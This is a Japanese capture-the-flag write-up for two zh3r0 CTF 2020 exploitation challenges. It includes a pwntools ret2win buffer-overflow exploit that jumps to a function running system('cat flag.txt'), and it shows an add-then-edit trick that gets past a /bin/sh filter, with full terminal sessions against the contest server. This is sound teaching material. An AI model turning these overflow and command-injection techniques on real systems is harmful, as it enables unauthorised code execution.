zh3r0 CTF 2020【Write up】
Free Flag
$ file chall chall: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=518d3397ca0a0d5e98e900e3f2e2937de34e3554, not stripped
$ checksec.sh --file=./chall RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 72 Symbols No 0 1 ./chall
$ ./chall Welcome to zh3r0 ctf. Please provide us your name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (コアダンプ)
BOFがあることがわかります。
gdb-peda$ i func All defined functions: Non-debugging symbols: 0x0000000000400598 _init 0x00000000004005c0 puts@plt 0x00000000004005d0 system@plt 0x00000000004005e0 alarm@plt 0x00000000004005f0 read@plt 0x0000000000400600 setvbuf@plt 0x0000000000400610 exit@plt 0x0000000000400620 _start 0x0000000000400650 _dl_relocate_static_pie 0x0000000000400660 deregister_tm_clones 0x0000000000400690 register_tm_clones 0x00000000004006d0 __do_global_dtors_aux 0x0000000000400700 frame_dummy 0x0000000000400707 win_win 0x000000000040071a here 0x000000000040076e init 0x00000000004007d9 main 0x0000000000400800 __libc_csu_init 0x0000000000400870 __libc_csu_fini 0x0000000000400874 _fini gdb-peda$ pdisas win_win Dump of assembler code for function win_win: 0x0000000000400707 <+0>: push rbp 0x0000000000400708 <+1>: mov rbp,rsp 0x000000000040070b <+4>: lea rdi,[rip+0x172] # 0x400884 0x0000000000400712 <+11>: call 0x4005d0 <system@plt> 0x0000000000400717 <+16>: nop 0x0000000000400718 <+17>: pop rbp 0x0000000000400719 <+18>: ret End of assembler dump. gdb-peda$ x/s 0x400884 0x400884: "cat flag.txt" gdb-peda$
gdbでデバッグしてみると、win_winという関数がありこれを呼び出せばsystem("cat flag.txt")が実行されることがわかります。
以下がExploitコードになります。
from pwn import * e = ELF('./chall') #p = process('./chall') p = remote('us.pwn.zh3r0.ml',3456) flag = e.symbols['win_win'] ret_addr = 0x004005ae payload = 'A'*40 payload += p64(ret_addr) payload += p64(flag) print p.recvuntil('name:') p.sendline(payload) p.interactive()
$ python solve.py [*] Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Opening connection to us.pwn.zh3r0.ml on port 3456: Done Welcome to zh3r0 ctf. Please provide us your name: [*] Switching to interactive mode zh3r0{welcome_to_zh3r0_ctf} [*] Got EOF while reading in interactive $ [*] Closed connection to us.pwn.zh3r0.ml port 3456 [*] Got EOF while sending in interactive
Command-1
command_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a90b629e4472aa6f35d5749a3bf1cab50f8bdb5a, not stripped
$ checksec.sh --file=command_1 RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH 86 Symbols Yes 0 4 command_1
$ ./command_1 Please enter your name: AAAA Hello AAAA ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 1 Enter the command you want to add. > /bin/sh I don't see where you are going you idiot
1.) Add commandで"/bin/sh"を入力すると当然ですが弾かれます。しかし、一旦適当な文字列をAddした後にEditすると好きなコマンドを入力することができます。それだけです。
$ ./command_1 Please enter your name: 1 Hello 1 ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 1 Enter the command you want to add. > AAA Command added at index [0] .------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 3 Enter index you want to edit: 0 Enter new command -> /bin/sh Command edited. ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 2 So you want to run the command: Enter the index of the command: ls $ id
$ nc us.pwn.zh3r0.ml 8520 Please enter your name: tekashi Hello tekashi ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 1 Enter the command you want to add. > ls Command added at index [0] .------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 3 Enter index you want to edit: 0 Enter new command -> cat "flag.txt" Command edited. ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit. > 2 So you want to run the command: Enter the index of the command: 0 zh3r0{the_intended_sol_useoverflow_change_nextpointer_toFakechunk_in_bssname} ------------------- 1.) Add command. 2.) Run command. 3.) Edit command. 4.) Exit.